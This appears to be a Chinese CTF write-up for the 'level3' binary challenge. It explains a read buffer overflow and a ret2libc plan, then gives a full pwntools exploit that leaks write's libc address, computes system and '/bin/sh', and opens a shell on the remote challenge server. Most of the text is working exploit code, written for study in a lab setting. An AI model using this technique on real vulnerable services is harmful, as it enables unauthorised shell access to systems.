image.png
0x00 file和checksec
image.png
0x01 ida查看
image.png
- 明显的
read溢出 - 没有
system,没有/bin/sh,但是有read和write,很明显的ret2libc
0x02 思路
- 第一次leak
write的地址 - 根据
write地址计算出libc_base - 找到
system和/bin/sh地址 - 第二次执行
system('/bin/sh')
0x03 完整exp
from pwn import *
from LibcSearcher import *
local=0
pc='./level3'
aslr=True
context.log_level=True
context.terminal = ["deepin-terminal","-x","sh","-c"]
libc=ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./level3')
if local==1:
#p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'})
p = process(pc,aslr=aslr)
#gdb.attach(p)
else:
remote_addr=['111.198.29.45', 48570]
p=remote(remote_addr[0],remote_addr[1])
ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
def raddr(a=6):
if(a==6):
return u64(rv(a).ljust(8,'\x00'))
else:
return u64(rl().strip('\n').ljust(8,'\x00'))
if __name__ == '__main__':
main_addr = 0x08048484
write_plt = elf.plt['write']
write_got = elf.got['write']
p.recv()
payload = ''
payload += 'a'*0x88
payload += 'fake'
payload += p32(write_plt)
payload += p32(main_addr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)
sl(payload)
write_leak = u32(rv(4))
print "write_leak=",hex(write_leak)
libc = LibcSearcher('write', write_leak)
#libc_base = write_leak - libc.symbols['write']
libc_base = write_leak - libc.dump('write')
print "libc_base=",hex(libc_base)
#system_addr = libc_base + libc.symbols['system']
system_addr = libc_base + libc.dump('system')
print "system_addr=",hex(system_addr)
#binsh = libc.search("/bin/sh").next()
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
print "bin_sh_addr=",hex(bin_sh_addr)
p.recv()
payload1 = 'a'*0x88
payload1 += 'fake'
payload1 += p32(system_addr)
payload1 += 'fake'
payload1 += p32(bin_sh_addr)
sl(payload1)
p.interactive()
0x04 结果
image.png
